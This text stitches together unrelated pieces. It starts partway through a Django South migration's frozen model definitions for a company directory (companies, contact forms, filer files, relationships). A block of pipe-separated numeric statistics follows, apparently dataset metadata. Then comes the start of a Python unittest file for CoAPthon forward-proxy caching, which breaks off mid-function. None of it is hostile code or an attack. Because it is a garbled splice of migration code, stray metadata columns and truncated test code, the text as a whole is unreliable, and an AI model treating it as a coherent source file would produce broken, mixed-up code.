'updated_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'bim_course_type_updated_by'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'companies.bimcurriculum': {
'Meta': {'object_name': 'BimCurriculum'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'related_name': "'bim_curriculum_created_by'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique': 'True', 'max_length': '100', 'populate_from': "'name'", 'unique_with': '()'}),
'state': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'updated_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'bim_curriculum_updated_by'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'companies.brochure': {
'Meta': {'ordering': "['order']", 'object_name': 'Brochure', '_ormbases': [u'companies.Resource']},
u'resource_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['companies.Resource']", 'unique': 'True', 'primary_key': 'True'})
},
u'companies.company': {
'Meta': {'ordering': "('title',)", 'object_name': 'Company'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'admin_primary': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'company_admin_primary'", 'null': 'True', 'to': u"orm['auth.User']"}),
'admins': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'company_admin_list'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['auth.User']"}),
'bim_courses': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'company_bim_course_list'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['companies.BimCourses']"}),
'bim_courses_curriculum': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'company_bim_curriculum_list'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['companies.BimCurriculum']"}),
'bim_courses_introduced': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'bim_courses_type': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'company_bim_course_type_list'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['companies.BimCoursesType']"}),
'brochures': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'company_brochure_list'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['companies.Brochure']"}),
'city': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['cities_light.City']", 'null': 'True', 'blank': 'True'}),
'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['cities_light.Country']", 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'company_created_by'", 'to': u"orm['auth.User']"}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'employees_count': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'fax': ('phonenumber_field.modelfields.PhoneNumberField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'featured_home': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'images': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'company_image_list'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['companies.Image']"}),
'logo': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['filer.Image']", 'null': 'True', 'blank': 'True'}),
'memberships': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'company_membership_list'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['companies.Membership']"}),
'operation_areas': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'company_OperationAreas_list'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['companies.OperationAreas']"}),
'ownership': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'phone': ('phonenumber_field.modelfields.PhoneNumberField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'products': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'company_products_list'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['companies.Products']"}),
'project_size': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'related': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'related_company_list'", 'to': u"orm['companies.Company']", 'through': u"orm['companies.CompanyRelated']", 'blank': 'True', 'symmetrical': 'False', 'null': 'True'}),
'sectors': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'company_sector_list'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['companies.Sectors']"}),
'services': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'company_services_list'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['companies.Services']"}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'state': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'type_companies'", 'to': u"orm['companies.CompanyType']"}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'updated_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'company_updated_by'", 'null': 'True', 'to': u"orm['auth.User']"}),
'videos': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'company_video_list'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['companies.Video']"}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'year_founded': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'})
},
u'companies.companyrelated': {
'Meta': {'ordering': "['from_company', 'relation']", 'unique_together': "(('from_company', 'to_company', 'relation'),)", 'object_name': 'CompanyRelated', 'db_table': "'company_company_related'"},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'companyrelated_created_by'", 'to': u"orm['auth.User']"}),
'from_company': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'from_company'", 'to': u"orm['companies.Company']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'relation': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'state': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
'to_company': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'to_company'", 'to': u"orm['companies.Company']"}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'updated_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'companyrelated_updated_by'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'companies.companytopic': {
'Meta': {'object_name': 'CompanyTopic'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'companies_companytopic_tagged_items'", 'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'companies_companytopic_items'", 'to': "orm['articles.Topics']"})
},
u'companies.companytype': {
'Meta': {'ordering': "['title']", 'object_name': 'CompanyType'},
'company_form_type': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'companytype_created_by'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
u'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
u'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'parent': ('mptt.fields.TreeForeignKey', [], {'blank': 'True', 'related_name': "'topic_children'", 'null': 'True', 'to': u"orm['companies.CompanyType']"}),
u'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'state': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
u'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'updated_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'companytype_updated_by'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'companies.image': {
'Meta': {'ordering': "['order']", 'object_name': 'Image', '_ormbases': [u'companies.Resource']},
u'resource_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['companies.Resource']", 'unique': 'True', 'primary_key': 'True'})
},
u'companies.membership': {
'Meta': {'ordering': "['order']", 'object_name': 'Membership', '_ormbases': [u'companies.Resource']},
u'resource_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['companies.Resource']", 'unique': 'True', 'primary_key': 'True'})
},
u'companies.operationareas': {
'Meta': {'object_name': 'OperationAreas'},
'countries': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'operation_areas_country_list'", 'symmetrical': 'False', 'to': u"orm['cities_light.Country']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'related_name': "'operationareas_created_by'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
u'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
u'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'parent': ('mptt.fields.TreeForeignKey', [], {'blank': 'True', 'related_name': "'OperationAreas_children'", 'null': 'True', 'to': u"orm['companies.OperationAreas']"}),
u'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique': 'True', 'max_length': '100', 'populate_from': "'name'", 'unique_with': '()'}),
'state': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
u'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'updated_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'operationareas_updated_by'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'companies.products': {
'Meta': {'object_name': 'Products'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'related_name': "'product_created_by'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique': 'True', 'max_length': '100', 'populate_from': "'name'", 'unique_with': '()'}),
'state': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'updated_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'product_updated_by'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'companies.resource': {
'Meta': {'ordering': "['company', 'order']", 'unique_together': "(('company', 'resource_type', 'resource_file'),)", 'object_name': 'Resource'},
'caption': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'company': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['companies.Company']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'company_resource_created_by'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'db_index': 'True'}),
'resource_file': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'company_resource_file'", 'to': u"orm['filer.File']"}),
'resource_type': ('django.db.models.fields.SmallIntegerField', [], {'default': '3'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'updated_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'company_resource_updated_by'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'companies.sectors': {
'Meta': {'object_name': 'Sectors'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'related_name': "'sector_created_by'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
u'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
u'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'parent': ('mptt.fields.TreeForeignKey', [], {'blank': 'True', 'related_name': "'sector_children'", 'null': 'True', 'to': u"orm['companies.Sectors']"}),
u'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique': 'True', 'max_length': '100', 'populate_from': "'name'", 'unique_with': '()'}),
'state': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
u'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'updated_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'sector_updated_by'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'companies.services': {
'Meta': {'object_name': 'Services'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'related_name': "'service_created_by'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique': 'True', 'max_length': '100', 'populate_from': "'name'", 'unique_with': '()'}),
'state': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'updated_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'service_updated_by'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'companies.video': {
'Meta': {'ordering': "['order']", 'object_name': 'Video', '_ormbases': [u'companies.Resource']},
'resource_external': ('embed_video.fields.EmbedVideoField', [], {'max_length': '200'}),
u'resource_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['companies.Resource']", 'unique': 'True', 'primary_key': 'True'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'envelope.companycontact': {
'Meta': {'object_name': 'CompanyContact'},
'company': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['companies.Company']"}),
'contact_company': ('django.db.models.fields.TextField', [], {}),
'contact_job_title': ('django.db.models.fields.TextField', [], {}),
'contact_phone': ('phonenumber_field.modelfields.PhoneNumberField', [], {'max_length': '128'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'envelope_companycontact_created_by_'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message_box': ('django.db.models.fields.TextField', [], {}),
'state': ('django.db.models.fields.SmallIntegerField', [], {'default': '2'}),
'subject': ('django.db.models.fields.TextField', [], {}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'updated_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'envelope_companycontact_updated_by_'", 'null': 'True', 'to': u"orm['auth.User']"}),
'user_email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'user_name': ('django.db.models.fields.TextField', [], {})
},
u'envelope.productcontact': {
'Meta': {'object_name': 'ProductContact'},
'company': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['companies.Company']"}),
'contact_company': ('django.db.models.fields.TextField', [], {}),
'contact_job_title': ('django.db.models.fields.TextField', [], {}),
'contact_phone': ('phonenumber_field.modelfields.PhoneNumberField', [], {'max_length': '128'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'envelope_productcontact_created_by_'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message_box': ('django.db.models.fields.TextField', [], {}),
'state': ('django.db.models.fields.SmallIntegerField', [], {'default': '2'}),
'subject': ('django.db.models.fields.TextField', [], {}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'updated_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'envelope_productcontact_updated_by_'", 'null': 'True', 'to': u"orm['auth.User']"}),
'user_email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'user_name': ('django.db.models.fields.TextField', [], {})
},
u'envelope.solutioncontact': {
'Meta': {'object_name': 'SolutionContact'},
'company': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['companies.Company']"}),
'contact_company': ('django.db.models.fields.TextField', [], {}),
'contact_job_title': ('django.db.models.fields.TextField', [], {}),
'contact_phone': ('phonenumber_field.modelfields.PhoneNumberField', [], {'max_length': '128'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'envelope_solutioncontact_created_by_'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message_box': ('django.db.models.fields.TextField', [], {}),
'state': ('django.db.models.fields.SmallIntegerField', [], {'default': '2'}),
'subject': ('django.db.models.fields.TextField', [], {}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'updated_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'envelope_solutioncontact_updated_by_'", 'null': 'True', 'to': u"orm['auth.User']"}),
'user_email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'user_name': ('django.db.models.fields.TextField', [], {})
},
u'filer.file': {
'Meta': {'object_name': 'File'},
'_file_size': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'file': ('django.db.models.fields.files.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'folder': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'all_files'", 'null': 'True', 'to': u"orm['filer.Folder']"}),
'has_all_mandatory_data': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_public': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '255', 'blank': 'True'}),
'original_filename': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'owned_files'", 'null': 'True', 'to': u"orm['auth.User']"}),
'polymorphic_ctype': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'polymorphic_filer.file_set+'", 'null': 'True', 'to': u"orm['contenttypes.ContentType']"}),
'sha1': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '40', 'blank': 'True'}),
'uploaded_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
u'filer.folder': {
'Meta': {'ordering': "(u'name',)", 'unique_together': "((u'parent', u'name'),)", 'object_name': 'Folder'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
u'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
u'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'filer_owned_folders'", 'null': 'True', 'to': u"orm['auth.User']"}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'children'", 'null': 'True', 'to': u"orm['filer.Folder']"}),
u'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
u'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'uploaded_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
'filer.image': {
'Meta': {'object_name': 'Image', '_ormbases': [u'filer.File']},
'_height': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'_width': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'author': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'date_taken': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'default_alt_text': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'default_caption': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'file_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['filer.File']", 'unique': 'True', 'primary_key': 'True'}),
'must_always_publish_author_credit': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'must_always_publish_copyright': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'subject_location': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '64', 'null': 'True', 'blank': 'True'})
},
u'relationships.relationship': {
'Meta': {'ordering': "('created',)", 'unique_together': "(('from_user', 'to_user', 'status', 'site'),)", 'object_name': 'Relationship'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'from_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'from_users'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'related_name': "'relationships'", 'to': u"orm['sites.Site']"}),
'status': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['relationships.RelationshipStatus']"}),
'to_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'to_users'", 'to': u"orm['auth.User']"}),
'weight': ('django.db.models.fields.FloatField', [], {'default': '1.0', 'null': 'True', 'blank': 'True'})
},
u'relationships.relationshipstatus': {
'Meta': {'ordering': "('name',)", 'object_name': 'RelationshipStatus'},
'from_slug': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'login_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'private': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'symmetrical_slug': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'to_slug': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'verb': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['envelope']
| 97.594937
| 262
| 0.577994
| 4,860
| 46,260
| 5.354938
| 0.061317
| 0.096523
| 0.168377
| 0.240538
| 0.853602
| 0.816715
| 0.799116
| 0.749741
| 0.73414
| 0.648607
| 0
| 0.00668
| 0.171574
| 46,260
| 474
| 263
| 97.594937
| 0.672416
| 0.005815
| 0
| 0.38022
| 0
| 0
| 0.614279
| 0.339662
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004396
| false
| 0.002198
| 0.008791
| 0
| 0.01978
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
16a268361c9855a9a7d66a5fcb5550adb56755f9
| 16,911
|
py
|
Python
|
cache_test.py
|
Dalanke/CoAPthon
|
6587d950c7cd76197beaf7b6b8d227d81340a8d7
|
[
"MIT"
] | 237
|
2015-01-06T17:13:39.000Z
|
2022-02-15T10:26:18.000Z
|
cache_test.py
|
Dalanke/CoAPthon
|
6587d950c7cd76197beaf7b6b8d227d81340a8d7
|
[
"MIT"
] | 143
|
2015-02-04T11:34:08.000Z
|
2022-03-04T10:58:30.000Z
|
cache_test.py
|
Dalanke/CoAPthon
|
6587d950c7cd76197beaf7b6b8d227d81340a8d7
|
[
"MIT"
] | 159
|
2015-02-10T00:57:34.000Z
|
2022-02-19T11:31:08.000Z
|
from Queue import Queue
import random
import socket
import threading
import unittest
from coapclient import HelperClient
from coapforwardproxy import CoAPForwardProxy
from coapserver import CoAPServer
from coapthon import defines
from coapthon.messages.option import Option
from coapthon.messages.request import Request
from coapthon.messages.response import Response
from coapthon.serializer import Serializer
import time
__author__ = 'Emilio Vallati'
__version__ = "1.0"
class Tests(unittest.TestCase):
def setUp(self):
    """Start an origin CoAP server and a caching forward proxy for each test.

    The origin server listens on 127.0.0.1:5684; the forward proxy (with
    caching enabled — the feature under test) listens on 127.0.0.1:5683.
    Test clients talk to the proxy, which forwards to the origin.
    """
    # Address the helper client sends requests to (the proxy, not the origin).
    self.server_address = ("127.0.0.1", 5683)
    # Random starting message ids so consecutive runs don't reuse the same mids.
    self.current_mid = random.randint(1, 1000)
    self.server_mid = random.randint(1000, 2000)
    # Origin server on port 5684, serving on its own thread.
    self.server = CoAPServer("127.0.0.1", 5684)
    self.server_thread = threading.Thread(target=self.server.listen, args=(10,))
    self.server_thread.start()
    # Forward proxy on port 5683 with cache=True (what these tests exercise).
    self.proxy = CoAPForwardProxy("127.0.0.1", 5683, cache=True)
    self.proxy_thread = threading.Thread(target=self.proxy.listen, args=(10,))
    self.proxy_thread.start()
    # Queue used by client_callback to hand async responses to the test thread.
    self.queue = Queue()
def tearDown(self):
    """Shut down the origin server and the proxy started in setUp.

    Each close() is issued before joining its listener thread; the joins are
    bounded (25 s) so a wedged listener cannot hang the test run forever.
    """
    self.server.close()
    self.server_thread.join(timeout=25)
    self.server = None
    self.proxy.close()
    self.proxy_thread.join(timeout=25)
    self.proxy = None
def _test_with_client_delayed(self, message_list): # pragma: no cover
    """Send each request through the proxy and compare replies field by field.

    :param message_list: iterable of (request, expected_response) pairs;
        either element may be None to skip sending / skip checking.

    Only the fields explicitly set on the expected response are asserted.
    A 5-second pause after every exchange lets short-lived proxy cache
    entries expire between steps (e.g. the max_age=1 ETag tests).
    """
    client = HelperClient(self.server_address)
    for message, expected in message_list:
        if message is not None:
            received_message = client.send_request(message)
        # Deliberate delay so cache state can change between exchanges.
        time.sleep(5)
        if expected is not None:
            if expected.etag is not None:
